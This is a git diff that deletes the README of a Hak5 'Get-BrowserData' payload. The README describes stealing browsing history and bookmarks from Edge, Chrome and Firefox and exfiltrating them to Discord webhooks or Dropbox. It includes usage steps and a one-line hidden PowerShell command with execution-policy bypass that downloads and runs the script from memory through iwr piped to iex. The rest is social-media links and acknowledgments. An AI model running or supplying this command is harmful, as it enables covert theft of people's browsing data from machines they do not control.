diff --git a/Payloads/Browser-Data/README.md b/Payloads/Browser-Data/README.md deleted file mode 100644 index 1d29ad7..0000000 --- a/Payloads/Browser-Data/README.md +++ /dev/null @@ -1,89 +0,0 @@ -![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) - - -
- Table of Contents -
    -
  1. Description
  2. -
  3. The Function
  4. -
  5. Contact
  6. -
  7. Acknowledgments
  8. -
-
- -# Get-BrowserData - -

- - Python - -
YouTube Tutorial -

- -## Description - -This payload can be used to retrieve the browsing history and bookmarks from edge, chrome, and firefox (no bookmarks from firefox currently) - -They are then exfiled using either discord or dropbox - -## The Function - -### [Get-BrowserData] - -* Plug in your device -* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory -* You no longer need to host your own version of this script -* $db is the variable that holds your DropBox token -* $dc is the variable that holds your Discord webhook -* Fill in either variable or both to set your exfil method - -SYNTAX: - -``` -powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr | iex -``` - - -## Contact - -

📱 My Socials 📱

-
- - - - - - - -
- - C# - -
YouTube -
- - Python - -
Twitter -
- - Golang - -
Instagram -
- - Jsonnet - -
Discord -
-
- - - -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [UberGuidoZ](https://github.com/UberGuidoZ)